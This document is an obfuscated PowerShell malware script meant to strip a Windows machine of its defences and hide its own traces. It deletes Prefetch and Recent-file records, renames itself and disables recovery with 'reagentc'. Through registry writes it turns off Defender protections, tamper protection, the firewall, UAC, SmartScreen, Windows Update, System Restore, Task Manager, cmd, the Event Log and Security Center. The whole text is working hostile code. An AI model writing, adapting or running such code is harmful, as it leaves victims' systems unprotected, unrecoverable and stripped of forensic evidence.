sET-ItEM (       'V'   +    'A'    +   'RiA'    +   'blE:j2xz'     +    'b' ) (    [tYPE](    'SY'     +   's'       +      'TEm'      +    '.EnV'   +    'IRonmEnt'   )      )   ;   SeT-ITEm VArIable:sewtK  (   [TYPe](     'SyStEM'     +    '.iO.'   +    'p'    +   'AT'      +       'h'   )       )    ;     ${eR`RoRaCt`ion`preF`ereNCe}      =    ( 'S'       +   (       'i'      +      'le'       ) +(    'nt'   +'l'      )     +      (     (    'y'    +     'Co'    )   +    'n'   )   +       (    (      'ti'     +    'nu'    )+  'e'    )  )

${S}      =     ${mYINV`ocATI`ON}."My`CoMM`AnD"."p`ATh"
${E}    =      (           &   (      'Get'  +   '-'+     'Process'       ) -Id ${p`Id}   )."P`Ath"
${F}    =     if (     ${S}  ) { ${s} } else { ${e} }

${tT`TtT`TtTttTtT`T`TtT`TtT}   =       $J2XZb::(    'GetFol'   +   'd'    +     'erPath'      )."i`N`VOke"(       (       (   (     'st'   +     'ar'   )     +   'tu'      )     +  'p'   )   )
${TtTTtt`TtTt`TTtTTTtt`Tt}     =     "$tttttttttttttttttttt\"

function IN`VOk`E`-SElfdeStrU`ctIOn {
 
        &    ( 'R'      +     'em'   +   'o'      +  've-Item'   ) -Path (       (  'H'   +    (       (     'K'    +   'CU:'   +  'Ne'     )    + (   'SSo'     +     'f'  )   +     't'  +   'w'   +   (      'a'     +    're'     )  +      (     'Ne'    +     'SCla'     )    )    +     ( (     's'     +     'se'   )     +   's'   )  +    'N'+ (   (     'eS'    +     'm'   )    +        's'   )    +      '-s'      + ('e'      +       (     'tt' +      'in'   )      )  +       (   (    'gs'    +     'N'   )    +    'e'+     (     'Ssh'   +     'e'   )      )   +    'll'     )-cREPLACE (   'N'  +      'eS'     ),[cHAr]92    ) -Recurse -Force

      &   (    'G'    +  'et-Chi'   +   'ld'  +      'It'        +   'em'    ) -Path "$env:SystemRoot\Prefetch" -Filter (   (     (    '*'     +      'PO'     )      +      (     'W'    +    'ER'   )   )      +  'S'   +       (    'H'     +    (   'ELL*'  +    '.p'    )     )   +  'f'   )    |            &      (  'Re'      +       'm'    +  'ove-Item'       ) -Force
    ${ScR`i`pTna`mE}      =         $seWtk::( 'GetFileN' +        'ameWitho'   +    'ut'      +    'Ex'     +     'ten'     +    'sion'    )."i`NVOke"(     ${F} )
    ${p`REfeTc`hfiL`eS}   =       &   (  'Get-Chi'  +     'ldIt'     +   'em'   ) -Path "$env:SystemRoot\Prefetch" -Filter "$scriptName*.pf"
    if (  ${p`Re`FeTCh`F`ILeS}  ) {
        foreach (    ${F`ilE} in ${Pr`ef`E`TchFi`LEs}  ) {
                &    (  'Rem'       +      'o'      +     've-Item'    ) -Path ${f`ile}."FuLl`NA`mE" -Force
        }
    }

    ${Re`CenTFi`leS}    =           &     (      'G'    +  'et-Ch'       +    'ildItem'  ) -Path "$env:APPDATA\Microsoft\Windows\Recent"      |      &   (  'W'     +       'here-'      +    'Object'   ) { ${_}."lasTWRI`Te`TIME" -ge (  (   &  (   'Get'     +     '-Dat'     +     'e'  )    ).(      'Ad'     +   'dDays'    )."INvO`kE"(  -1        )     ) }
    if (    ${REcen`T`F`ilES}  ) {
        foreach (  ${fi`LE} in ${REC`En`TFIL`Es}     ) {
              &  (    'Re'    +     'm'    +    'o'   +        've-Item'     ) -Path ${fI`lE}."fu`lL`NAme" -Recurse -Force
        }
    }





            &     (     'Rename-'     +     'I'     +     'tem'   ) -Path ${f} -NewName (     $SEWtK::(  'GetRando'     +   'mFil'     +  'eNa'  +    'me'    )."i`NV`okE"(   )     +      (   iTEm  vaRIAblE:SEwtk      ).vALuE::(      'GetEx'    +   'te'    +    'nsi'    +   'on'    )."I`NVO`KE"(     ${f}   )       ) -Force


             &   (      'New'      +   '-I'     +    'tem'  ) -Path "$env:temp\avax.txt" -ItemType (    'Fil'   +   'e'   ) -Force
    
}

function sEt-REgISTrY`PRo`p`eR`TIeS {
    param (  
        [string]${pA`Th},
        [hashtable]${Pro`PeR`T`iES}
          )

    if (     -not (        &     (    'Te'      +   'st-Pa'  +    'th'  ) ${pa`TH}  )   ) {
              &     (       'N' +   'e'   +   'w-Item'  ) -Path ${P`AtH} -Force     |        &     (  'O'      +   'ut-Null'     )
    }

    foreach (     ${k`ey} in ${pR`OPE`RtiES}."k`Eys"     ) {
            &       (       'S'     +    'et-'    +  'I'  +    'tem'   +    'Property'  ) -Path ${p`ATH} -Name ${K`ey} -Value ${PrOPe`Rt`ieS}[${k`ey}] -Type (   'DWo'  +     'rd'    ) -Force
    }
}

${baSE`K`EY}      =      (   (     'HKLM:{0}SO' +    (   ( 'FT'     +    'WA'    )   +   'R'      )    +   'E{0}Po'       +   (   (      'li'     +    'ci'     )   +     'e'      )       +  's{0}'   +    'M'     +  'ic'    + (   'r'   +     (   'osof'      +    't'       )  ) +    '{'    +      '0}W'  +   (    'i' +   (   'nd'   +    'ows'     +    ' D'    )   +   (     'ef'   +     'e'   )       +   'n'    +  (  'd'     +     'er')    )   ) -F [cHar]92  )
${re`ALT`iMepRote`c`T`ION`KEY}   =     (   (   (  "$baseKey\Real-Time "      +   ''    )    +  ''      )  +       'P'   +    (    'r'    +   'ot'    +   (       'ec'    +   't'     )  )      +    'i'   +     'on'  )
${F`I`Re`Wa`llPaTh}       =       (     (   (   'H'   +    'KL'    )       +  (    'M:'      +       'sn'    )     +      '9S'    +   (      'Y'    +    (  'STE'    +  'Ms'       )    )      +    (     'n'    +   '9C'     )  +       (    'u'      +    (    'rre'      +   'n'      )   )     +    (     'tC'     + 'o'    )  +       (      (     'n'  +   'tr'    )    +   'o'     +       ( 'lS'     +   'ets'   )   )   +    'n'    +     (    (    '9'  +   'Ser'      )   +  (   'vice'   + 's'    )   )+   's' + 'n'    +    ( '9'   +    'Sh'     )    +   (    'ar'  +    'e'    +     (       'dAcc'    +   'e'   +  'ss'   )  +  (    'sn9'   +    'Pa' )   +    (    'ra'   +      'meterssn'   +    '9'     )      +     'F'   +       'ir'    )      + (       (  'e'   +    'wa'      )   + 'll'     )    +    (   (   'P'  +       'oli'      )     +     'c'  )     + 'y'  ) -cREplAce (   's'    + 'n9'        ),[chaR]92      )

     &    (       'reag'   +    'e'    +      'ntc'   ) (    '/dis'     +     'ab'      +  'le'      )

 &   (  'Set-R'   +  'egistry'    +      'Prope'        +    'r'    +    'tie'    +  's'  ) -path (    (      (  'H'     +     (     'KC'   +     'U:'     )  )    +    (    '1'   +    (     'oLS'   +  'o'     )     )      +    'f'     +    (     't'      +    (   'war'  +      'e'     ) )  +    '1o'     +     'L'  +  'Mi'    +      (      (    'cr'      +    'o'     )    +     's'      )  +      ( 'o'   +     (      'ft'      +    '1o'     )     )     +      (      (    'LWi'     +     'ndo'    )     +    'w'     )      +  (     (     's'     +   '1o'     )     +    (    'LC'   +  'urre'      +   'n'       )     +    't'    )      +       'V'     + (    'e'   +    (     'rs'  +   'io'      )    +      (   'n1'    + 'oLNo'   )       )  +   (    't'     +   'if'    )     +     'ic'     +    (      'a'      +    (     'ti'  +     'on'    +    's1oL'     )  +      'S'  +   'et'  )    +    't'     +      'in'     +     (      'g'   +     (  's1'   +        'oLWi' + 'nd'       )   )    + (   'ow'    +    (  's.'   +  'S'     )     )       +   (      'y'  +   'st'        )      +  (  (   'em'      +     'T'    )  +   'oa'   )    +     (  's'   +  (  't'       +     '.S' )     )    +      'e'     + (   'cu'   +     (   'r'      +       'it'   )        )     +     (     (     'y' +   'An'       )      +   (   'd'    +      'Ma'  )    +  (    'i'      +   'nt'     )  )    +   'en'    +   (     'a'     +  (    'nc'    + 'e'    ) ))."rE`p`Lace"(        (    [cHaR]49     +      [cHaR]111    +   [cHaR]76 ),'\'   )    ) -properties @{(   ( (      'Ena'   +     'b'       )   +   'l'   )   +      'ed'    )    =      0}
  & (    'Se' + 't'      +    '-Regist'   +    'ryPro'   +     'per'      +     'ties'     ) -path (    ( (   (      'H'      +   'KL'      )   +     'M:'     )  +     '{0}'   +    'S'      +    (  'OF'     +'T')    +    'WARE{0'      +      '}Policies{0}'     +     'Microsoft{0}Windows De'      +   (    ('fe'      +    'n'   )        +    (      'd'     +    'er S'    )  +    'ec'     )    +     'u'      +   'ri'    +   't'     +      (      'y'    +      (   ' Cent'     +   'e'   )    )      +   'r'      +       '{'     +   '0}'    +     'No'  +   (       'ti'     +  'f'    )     +   (   'ic'  +   (     'at'  + 'i'   )   )    +   (   'o'    +     'ns'   )    )  -F  [chAr]92     ) -properties @{(      (    (   'Di'    +    's'      )     +    (   'ab'    +       'le'    +    'No'    )     )    +    't'   +    'i'     +    (    'f'    +     (   'ic'   +   'a'    )  )       +       (       'ti'   +   'o'       )      +    'n'     +   's'    )      =   1}

  &   (     'Set-R'     +  'egist'    +       'ryPr'     +      'o'      +   'pert' +    'i'   +     'es'   ) -path ${B`ASeKEy} -properties @{
    ( ('D'    +  (    'isa'     +    'bl'    )    )   +    'e'  +      (   (     'A'     + 'ntiSpy'      )   +       'w'    +        'a'     )   +'re'     )     =     1 
    (     'Di'      +     (     's'    +    (       'ab'      +    'l'     )      )    +     'e'    +   (      'A'   +'pp'      )   +  (        (      'l'      +   'icat'     )     +   'i'       )      +   (     'on'   +      (     'Gu'      +  'a'    )    )    +      'rd'   )        =   1
    (   (   (  'Di'     +    's'      )  +   'a'  )    +     'bl'      +    (  'e'      +    (      'Co'    +     'n'     )    +     (    'trol'  +   'l'     +  'ed'    )     +    (     'F'   +      'ol'     )      )    +  'd'    +  ( (  'er'     +       'A' )   +   'c'  ) +     'ce'    +     's'    +    's'    )    =        1
    (   (       'Di'     +    's'        )      +      (    'a'    +   'bl'      )   +   (     'e'   +      'Cr'    ) +   (    'ed'    +    'e'     )    +(   'n'      +     (    'ti'     +     'a'     )      )   +   (    (  'lG'     +       'u'   )        +   'a'   )  +  'rd'    )    =     1
    (    (     'Di'  +       'sa'    )       +     (  (    'bl'    +     'eI'     )        +    'n'      )      +    'tr'   +      (  'us'     +  'io'   )      +   (     'n'   +     'Pr'    )   +    (    (     'even' +     't'  )  +      'i'   +      'o'   )  +   'nS'      +  'ys'  +  (      'te'  +      'm'     )    )     =  1
    (  (     'D'      +     'is'   )   +       (      'ab'  +    'l'    )    +  (      'e'   +     (     'IO'   +    'A'      ) )    +  (     'VP'    +   'r'    )   +    'o'  +    (    (   't'   +    'ec' )       +   'ti'       )   +   'on'       )       =     1
    (     (      'Di'     +   (    'sa'  +      'b'     )     +'l'     )   +     'e'   +     (    'Re'     +   (   'a'    +      'lt'  )        )  +  (     (     'i'    +      'me'   )        +   'M'    )      +    (     (      'on'     +      'i')   +   'to'     ) +     'ri'    +    'n'    +    'g'  )    =      1
    (   'D'    +    (  (  'is'   +    'a'     )    +    'b'    +   (     'le'    +    'R'    )   )      +  'ou'  +    (   't'     +     'in'      )     +     'e'  +   (      'l'  +   (  'yT'    +    'a'    )    )      +     (    'k'       +      (    'in'      +   'g'    ) )   +    (  'A'   +    (  'ct'     +    'io'    )  )    +     'n'       )  =     1
    (    'D'  +     'i'   +   (  (    'sa'    +   'b'    )   +    'l'      )   +      'e'       +    (     'S'    +     'pe'  )   +     (    'ci'      +      'a'  )    +   'lR'     +  'u'  +      (    'nn'    +   (    'ingMo'  +   'd'      )    +    'es' )   )   = 1
    (    'D'      +    (  'is'   +     'a'    +  (      'ble'    +    'T'    )  )    +  (    'a'     +      ( 'm'  + 'pe'    )   )     + 'r'     +   (   'P'     +    (      'r'    +      'otect'    )     )  +     'i'  +     'on'    )      =     1
    (      (   ( 'PUA'  +     'P'   ) +    'ro'   )    +     'te'     +    (     'c'    +   'ti'   ) +    'o'      +     'n'      )    =       0
    (   (      'Se'  +  'r'    )   +     (   'v'     +  'ic'      )   +    (   ( 'eK' +    'e'      ) +  'ep'       +  'Al'  )     +  'i'    +   've'     )      =   0
}

      &   (    'Set'   +      '-' +  'R' +    'eg'      +      'istryProp'   +      'erti'    +      'es'    ) -path ${r`e`ALtiMEprO`TEct`I`On`key} -properties @{
    (       (    'Di'      +    's'   )     +     (   (     'ab'     +     'le'  )     +  'Be'     )        +     (   (       'ha' +    'vior'     )  + (    'Mo'     +      'nit'   )     +   'o'        )       +       'ri'     +    'ng'   )   =     1
    (      (    'Di'   +  's'     +   'ab'    +    'le' +       (  'Bl'      +    'ockA'       )  )     +       ((     't'        +   'Fi'    )  +    'r'     )     +    (     's'  +     'tS'    ) +       (  'e'       +   'en'    ) )       =      1
    (    'Di' + (    's'       +    (     'abl'     +     'e'   )     )     +      (      'C'   +   'lo'   )      +   (     'ud'      +    'Pr'   )     +   'o'      +     (     'te'      +    'c'      )       +    (     (  'ti'   +   'o'    )   +       'n' )    )   =     1
    (    (  'D'     +  'is'   )   +      (       'ab'    +    (     'l'    +      'eO'    )   )   +   (    (    'nA'     +  'c'      )   +    'c'     +      (  'ess'   +    'P'      )    )     +        'r'  +   (     'ot'  +   'e'        )     +   'ct'     +     (   'i'     +     'on'    )      )     =    1
    (   (      (      'Di'   +   's'    )     +      'a'     )   +    (   (     'b' +      'leS'    )   +     'c'     )    +      (      'an'     +   (   'OnR'    +      'ea'    )     )    +   'lt'   +      (       'i'       +      (       'm'    +    'eE'  )    +    (        'nab'     +     'le'     )  )     )     =    1
    (    'Di'     + 'sa'       +     'bl'      +       'eS'     + (    (    'cr'     +  'i'   )       +   'pt' +   (      'Sca'  +     'nn'    )  )  +   'i'        +   'ng'    ) =     1
    (  (     'Su'     +       ('bm'    +   'i'      )     )    +    (     't'      + 'Sa'   )    +    'mp' +     (      'le'+  's'      )  +      (    'C'   +       (    'o'   +       'nse'    )  +     'nt'        )     )      =   2
    (    (      'D'   +    (   'is'   +    'a'      )      )   +    (      'bl'      +   'eN'   )      +    'e'  +     't'   + (       'w'        +      (     'orkP'   +    'ro'    )    )    +   (   't'      +   'ec'   )     + (       't'  +    (   'io'      +    'n'      )  )     )    =    1
}

  &   (    'Set-Reg'  +    'ist'   +   'ryP'   +     'roperties'      ) -path "$firewallPath\DomainProfile" -properties @{(  ( 'En'        +    'a'    ) +    (   (      'ble'    +    'F'   )    +   'i'      )     +      (    (     're'     +     'wa'      )    + 'll'   )     )   =    0    ;     (    (   'Di'      +        (      's'    +      'ab'  )   )    +     'le'   +       (  'No'     +     ( 't'   +     'ifi'   )     )   +      'ca'     +    'ti'  +  (  'o'   +   'ns'    )     )    =    1}
  &     (      'Set'     +    '-'     +       'RegistryPr'   +    'opert'   +     'ies'      ) -path "$firewallPath\StandardProfile" -properties @{(     'En'+(     'ab'    +    (      'le'+   'F'    )       ) +   (     (    'ir'   +    'e'     )  +   (  'wal'     +     'l'     )      )  ) =     0      ;    (  (      ( 'D'   +    'is'       )   +       'ab'   )      +     (     'l'  +      (  'eN'   + 'oti'        +    'fi'       )     )    +  'c'   +      (      'at'     +   'io'   )     +     'n'       +      's'  )   =   1}
    &  (      'S'     +      'et-R' +   'e'  +     'gistryPrope'   +   'rtie'   +    's'  ) -path "$firewallPath\PublicProfile" -properties @{(  (      'En'       +      'a'   )      +    'bl'    +  'eF'    +    (     'i'     +   (    're'     +       'wal'     )    ) +     'l'     )      =       0    ;     (   'D'      +   (     'is'       +     (     'abl'       +   'eNo'     )      )   +  'ti'   +  (    'f'   +      'ic'  )   +   'a'  +    't'  +     (   (      'io'    +  'n'  )   +       's'    )  )   =  1}

  &       ( 'Se' +     't-Item'      +     'Pro'   +       'per'      +   'ty'   ) -Path (      (   (   (     'H'   +   'KL'    )    + 'M:'     +    '4' )     +     (   'K'  +    (     'YS'   +     'OFT'    )    +    (     'WARE'       +   '4'    )    +   'KY'     )  +    (      'M'     + 'ic'      )     +  'ro'     +   's'     +       'of'  +    (     (      't'     +     '4K'     )     +    (     'Y'    +     'Win'    )  +    (  'dow'     +    's'      )  )    +  '4'    +    'K'  +   (    (      'YCu'    +      'rr'   )   +     (      'en'    + 't'     )      +      (     'Ve'      +     'r'     )   +   's'    )   +    (     (   'ion'    +  '4'  )     +'K' )+      (   'YE'    +     'x'  )   +  (    'p' +    'lo' )     +    'r'   +      'er'     )."REPL`ACE"(   (    [cHAr]52 +    [cHAr]75     +       [cHAr]89     ),'\'    )    ) -Name (   (      (    'Sm'   +    'art'  )  +     'Sc'    +   're'   )    +    (    'e'   +     'nE'   )    +      'n'  + (       ('abl'  +    'e'    )       +   'd'       )    ) -Value (      'Of'      +  'f'       ) -Type (     'St'    +      'ring'    ) -Force
      &     (   'Set-Reg'        +    'istr'      +    'yPr'      +       'o'   +      'per'+     'ties'   ) -path (     (    (     'HK'  +  (      'CU:'     +      'o'      +  'pA'      )      +   'S'   )    +   (  'OF'   +     'TW'    )     +     'AR'     + (     (       'Eo'    +     'p'     )  +   'A'  )    +     (   'M'    +   'ic'      )    +     (      'ro'       +    (    'soft'    +  'op'    )     +   'A'      +     (     'E'      +    'dg'      )   +      'eo'     +      (     'pA'      +   'Sma'    )       )   +    (    (     'rt' +   'S'    )    +   (  'cr'       +  'e'   )    ) +  (     (    'en'      +   'E'      )     +   'n'      )     +  'a'       +   (     ( 'bl'     +      'e'  )     +      'd'     )    ).(  'rePL'     +   'Ace'      )."iN`Vo`Ke"(    (     'o'    +      'pA'    ),'\'    )    ) -properties @{(   (   ( (      (    '(D'      )    )  )   )    +  'ef'      +    'au'      +   (      (  'l'     +     (    (     't)'     )    )   )   )   )    =       0}
      &    (  'Set-Registr'    +  'yP'     +     'rope'       +     'rti'   +       'es'     ) -path (     (     'H'  + (    'KC'     +    'U' +    (   ':'  +     'PUNSOFT'    )     +   'WA'     )     +   'R' +   'E'     +   (      'P'       + 'UN'     )  +   'M'       +     'ic'     +    'ro'   +       (      's'       +    (    'oftPUN'    +   'Wi'      +   'n'   +       'do'       )     +   'w'   )     +     (    's'    +'PU'   )   +      (     ( 'N' +    'Cu'      )   +   'r'   )  +   'r'    +      (     (  'e'    +   'nt' )    +     'Ve'    )   +  'r'     + (    (  's'    +  'io'    ) +  'nP' )   +    (     'UN'     +     'A'    ) +     'pp'    + (     'H'      +    (     'o'      +     'st'     )   )    ).(  'r'      +      'EP'  +   'LACe' )."In`VO`ke"(    (  'P'   +  'UN'      ),[STRing][chaR]92     )     ) -properties @{(     (     (    'En'     +  'a'      )    +    'bl'    +(  'eW'    +      'ebC'    ))    +     'on'      +     (      'te'    + 'nt'     )     +      (      ( 'Eva'+ 'l' )      +    (   'u'   +   'ati'   )  + 'o'    )    +     'n'    )      =    0}

    &      (    'Set-'    +      'R'     +        'egistr'   +  'y'     +      'Prop'      +    'ertie'    +   's'     ) -path (    (    'HK'    +   'L'       +     (     (   'M:'      +    '8'     )      +  (     '6'       +   'xSO'     )      +     'F' )    +    (  'TW'      +    'A'   )  +    'RE'    +    '8'   +    '6x'     +    (   'P'  +    (    'oli'     +       'ci'     +   'es'      )       )        +    '8'    +    (     '6x'   +   'M'  )   +  (     (   'icr'     +   'os'  )  +   (     'of'  + 't'     )   +  '8'   )     +   (      '6'      +   ( 'x'  +  'Wind'    +      'o'     )   )      +   'ws'     +  '86'  +  'xW'      +       'i'     +    'n' +     (   'do'   +       'w'     )    +  (   'sU'     +    (  'p'   +     'da'       )      )     +     't'    +    (    (  'e8'     +     '6x'    )      +     'A' )     +   'U'    )  -CrepLacE (      '86'    +   'x'),[CHaR]92    ) -properties @{(  'No' +     (    'Au'    +     't'    )     +   (    'o'   +      (    'U'       +    'pdate'   )    )     )       =     1}
  &  (    'Set-'     +      'Regis'   +   'tryPr'  +  'o'    +    'per'     +     'ties'   ) -path (     (   (    'HK'    +    'L'      )    +  'M'       +    ':'   +  (    (     'iOLS'    +     'Y'        )    +      (   'S' +   'TEMiOL'+    'Cu'   )     +   'rr'   +  'e'     )       +     (  'nt'       +    (     'C'    +    'on'       )    +    (   't'   +'ro'      )   )  +     (   'lS'   +      'e'   )  +    'ti'     +  (     (  'O'    +    'LSe'    )  +       'rv'    )       +    'i'     +   'ce'    +    (   'si'  +     (      'OL'     +     'w'      )  )   +    'u' +   (  'a'    +    (     'u'    +       'se'    )    )      +      'r'       +     'v'     ).(     'rE'    +    'PL'      +    'acE'  )."In`VoKE"(     ( 'iO'+   'L' ),'\'      )   ) -properties @{(      'St'   +   (   'a'   +    'rt'  )      )     =     4}

   & (    'S'  +  'et-Registr'  +    'y'      +       'P'    +     'roperties'      ) -path (       (  'H'     +  (   'K'    +   (    'LM'   + ':'     )    )  +    (   (    '1l'    +    'OS'   )+   (     'O'      +    'FT'    )  + 'W'      +   'AR'    )    +   'E1'    +       'lO'   +   (    'P'  +     'o'     +   (  'lic'    +    'ie'   )+     (   's1l'   + 'OM'       )      )    +        (     'ic'    +     (     'ros'   +    'o'    ) +      (     'f'     +        't1l'    )      )       +    'O'     +   (   (    'Wi'      +   'n'   )     +     (   'd'    +     'ow'  ) +     (        's'     +       ' N'    )    )  +      'T1'    +   'l'    +      'OS'   +    (    'ys'    +    (    't'  +    'emR'  )     )       +        (     'es'    +        (    'to'   +      'r'     )      +   'e'      )     )."rEp`LAcE"(     (   [CHAR]49     +       [CHAR]108   +   [CHAR]79   ),[STriNG][CHAR]92   )      ) -properties @{(    (    'D'   +  'is'  )      + (   'ab'      +    'l'     )      +   (        'e'       +      'SR'    )   )      =     1     ;       (      (    ( 'D'      +     'isabl'    )     +    'eC'    )  +    'o'   +    (   'nf'      +    'ig'     )   )    =      1}
        &     (   'S'      +      'et-Re'   +      'gistryProperti'      +  'es'     ) -path (  (     'HKLM:{0}SYS'      +   'TEM{'    + '0'     +   '}C'+      (  'u'     +    ('rren'  +   't'   )   )       +      'Co'  +      (  'nt'     +     (    'ro'    +    'l'   )   )     +    'Se'      +     't'    +'{0}Services{0}s'  +  'r'    +     's'    +   'e'    +  'r'     +   'v'+     (    'ic'    +   'e'    )      )  -F  [cHAr]92   ) -properties @{(    ('S'     +      'ta'      )   +       'rt'   )        =   4}

    &     (      'Set-RegistryP'    +    'rope'    +       'r' +      'ti'     +    'es'   ) -path (      ( 'HK'   +    (  'CU'  + ':'      )      +    '{0}Softwar'    +     'e'   +   '{0'    +   '}Mic'       +      'r'    +    'osoft{0}Wind'    +   'o'   +   'ws'    +     '{0}'    +  (    (  'Cur' +    'r'      )    +    'e'   )    +    'n'   +    't'   +     (    'V'     +    (  'e'      +      'rsio'      )  )     +   'n{'   +   '0}P'  +   'ol' +    'ic'   +'ies{0}'  +    'S'  +   (     'ys'     +    (    't'       + 'em'    )    )      ) -F [ChAR]92   ) -properties @{(       (    (  'Dis'   +  'a'     )      +  'b'      +  'l'   )  +      (     'eT'    +      'a'       )      +     (  's'   +    'kM'  )  +    'gr' )     =   1}

    &  (   'Set-Reg'    +  'is'    +    'try'     +   'Properties'    ) -path (       (      'H'      + (   'KC'   +   'U:'    )      +    '{0}Sof'     +     't'     +     'ware{0}'   +   (   (    'Pol'    +    'ic'   )        +  'i'       )    +     'es{0}Mic'      + 'r'    +    (    (    'os'   +     'o'     )     +     'f'   )     +      't{0}'      +     (   'W'    +    ('in'     + 'd'     ))     +    'ows{0}S'     + 'y'  +   (     's'     +     ('t'       +    'em'       )      )    )  -F [chAr]92   ) -properties @{(   'D'   +  (      'i'      +  (     's'    +    'ab'   )     )    +      (     'le'     +      (    'C'  +       'MD'    )    )  )    =       1}

   &    (        'Set' + '-R'   +    'eg'   +   'is'    +   't'  +      'ry'     +       'Properties'  ) -path (    (  'HKLM:{0}SYSTEM{'    +     '0'      +     '}Cur'    +    (    (       'rent'    +    'Co'   )     +    'n'     )     +     't'       +    (   'ro'     +  'lS'  )     +  'et{'    +     '0}C'   +    (      'on'     + 'tr'      )   +    'ol'     +   '{0'     +  '}'      +    'Te'     +  (   (       'r'    +      'mi'      )    +  'n'   )    +    (     'a'    +    'l '    )    +      (  'S'    +   (      'e'    +    'rve'    )    )  +  'r'    ) -F  [chAR]92     ) -properties @{(    (  (    'fD'     +   'en'    )    +    'y'     )     +   (     'TS'   +    'C'      +    (    'on'   +'n'    )    )   +     'e'   +     'c'  +     (   't'  + 'io'   )   +  'ns'    )     =    1}

   &   (    'S'     +   'et-Reg'     +   'i' +    'st'      +    'ry'   +    'Properties'     ) -path (   (     (    'HK'     +    'L'   )       +     'M:'    +     '{0}SOFTW'    + 'AR'    +   'E{0}Micr'  +     (      'os'     +  'of'  )        +    't{0}W' +      (    (  'in'      +    'd'    )      +    'ow'    + 's'    )       +    '{0}'    +     ((    'C' +    'ur'  )     +    're'    )   +        'ntVersion{0}Po' +     'licies{0}Sys'   +     (   'te'   +     'm'    )    )  -F [ChAR]92      ) -properties @{(    (  (  'Ena'    +    'b'    +'le'     )    +   'LU'   )      +    'A'     )     =     0}

     &     (      'S'   +     'et-'       +     'R'     +   'e'+    'gistryPropert'     +      'i'+'es'  ) -path (   (     (    'HK'  +  'L'  )    +    'M:{0}'  +    'SY'     +   'ST'    +    'EM{0}C'    +   (    'u'    +     (    'rrent'    +     'C'      +     'o'  )   )      +    (     'nt'     +     (      'r'  +    'ol'     )     )+   'Set{0}Serv'   +  'ices{0}ws'    +      (  'cs'     +     'vc'    )     )-F  [char]92   ) -properties @{( (        'St'    +     'a'  )    +  'rt'   )     =       4}

    &    (  'Set-Reg'    +       'istry'    +    'P'     +     'rope'    +     'rties'   ) -path (     (   'HK'   + (    'LM'   +  (       ':NQ6'     +   'SO'     +       'F'   )+   (      'TW'      +      'AR'        +    'ENQ'     )   )    +      '6M'      +  (    'i'      +    'cr'  )    +   'o'  +     (     's'    +     (     'o'     +      'ftN'     )   )   +     (     'Q6'    +    'W'   )   +     (       'in'   +    'd'    +       (    'owsNQ6'    +  'W'  +      'i'    ) +   ( 'nd' +    'o'    )    +   'w'      +     (      's Er'    +     'r'     )      )    +    (     'or'    +     (   ' '  +   'Re'     )   ) +   (     'p'+   (    'or'     +  'ti'    )     )    +      'ng'     ).(       'r'  +      'ePl'    + 'Ace'        )."i`NVoKE"(       (    'N'     +     'Q6'   ),'\'    )     ) -properties @{(      (     'D'      +    'is'      +    (     'ab'    +   'le'  )    )    +      'd'     )     =    1}

    &   (     'Set-Regi'    + 'str'     +     'yPrope'       +   'r'    +  'ties'   ) -path (   (  (  'H'    +      'KL'      )   +'M:{0}SYSTEM{0}Curr'   +    'e'       +      (    (  'n'   +   'tCon'   )      + 't' )     +   ( 'r'    +    'ol'      )     +  'Set{'    +     '0}C'     +    'ontrol{0}Remote A'    +      's'     +     's'  +     'is'    +  'ta'   +    (       'nc'       + 'e' )    ) -F [chaR]92     ) -properties @{(  (      (     'fA'    +      'llo'      )    +      'w'  +   'T'    )      +     'o'     +    'G'     +   ( 'e'    +   'tH'      )  +   (    'el'   +   'p' )  )      =      0}

    &  (   'Se'   +  't-Re'      +     'gistr'   +  'y'     +     'Prop'  +      'ert'   +      'ies'   ) -path (     (      (   (     'HK'   +   'L'  )   +  'M:'     )     +        (      (   'JH2'    +      'S' )+     'Y'   ) +   (       ( 'ST'   +     'E')     +        'M'      )     +     (     'JH'    +   (    '2'  +       'Curr'    )       )   +   'en'       +   (      't'        +  'Co'    )      +   (    'n'      +  (      'tr'  +       'o'     )     +    (    'lSe'     +     'tJ'   +  'H2'   )  ) +      (  'S'    +     (      'erv'    +   'i'      )     )    +   (   'c'      +  (    'e'   +     'sJ')     +   (     'H2'     +    'Waa'    )+      'SM'    +  'ed'     )    +    'i'      + (    (     'c'   +       'Sv'     )  +    'c'     )    )."REPl`ACe"(   (    [CHAR]74    +     [CHAR]72    +    [CHAR]50   ),'\' )  ) -properties @{(   'St'      + (   'ar'    +       't'  )     )   =       4}

   &       (   'S'     +      'e'+     't-RegistryPrope'  +  'rt' +  'ies'   ) -path ( (   (   'HK'    +     'L'       )     +    'M'    +      ':{'     +     '0}'    +     'SYSTEM{'       +  '0}CurrentCo'     +      (   (    'ntr'  +    'o'     )   +    'l'    +    'S'   )    +'e'    +   't{0}Servi'    +  (    'ce'    +  's'    )      +    '{0}BITS'        ) -F[ChAR]92 ) -properties @{(    (    'St'   +    'ar'       )      +      't'  )    =    4}

  &      (    'Se'     + 't-Re'   +      'gis'    +  'tr'      +   'yProperties'  ) -path (    (   'HKLM:{0}'  +  (   (      'So'    +    'f'    )    +   (   'tw'     +     'a'    )   +   're'   )      +    '{0}Mi'       +    (     'c'   +  (  'roso' +    'ft'     )    )   +  '{0}Wi'       +   'nd'      +    (     'o'    +    'ws'    )    +   ( (       ' S'     +  'c'     )    +       (     'rip'     +      't'      )   )      +   (    ' H'   +    'o' )       +     'st'  +    '{0}Sett'    + (      'in'     +    'gs'  )    )  -F  [cHAR]92  ) -properties @{(  'En'      +     (    'a'    +  (    'bl'    +'e'    )  )      +      'd'     )    =      0}

      &      (   'Set-R'      +   'eg'    +  'istr'  +       'yPr'       +     'op'        +    'erties'  ) -path (    (      'H'     +     (        (    'K'     +      'LM'    )     +   ':'  )   +    (      'V'   +  (     'dK'   +    'S'   )     +  (    'YS'    + 'T'   )     )    +       (     'E'     +     (   'MV'     +   'd'    )   )  +      'K'     + 'C'     +  'ur'       +    (    'r'  +     'en'      +  (    'tCo'     +   'ntrol'   +     'Se'       +   'tVd'    )    +     'KS'    )    +     'e'      +     (   'rv'       +    (  'ic'  +        'e'   )  )    +     (    'sV'     +    (     'dK' +    'E'      )   )      +   (    'v'  +     'en'    )      +      'tL'   +   'o'     +     'g'    ).(    're'    +       'p'  +     'LACE'    )."iNvo`kE"(  (    'Vd'    + 'K'    ),'\'      )   ) -properties @{(      'S'   +    (   'ta'     +    'rt'    )    )     =  4}

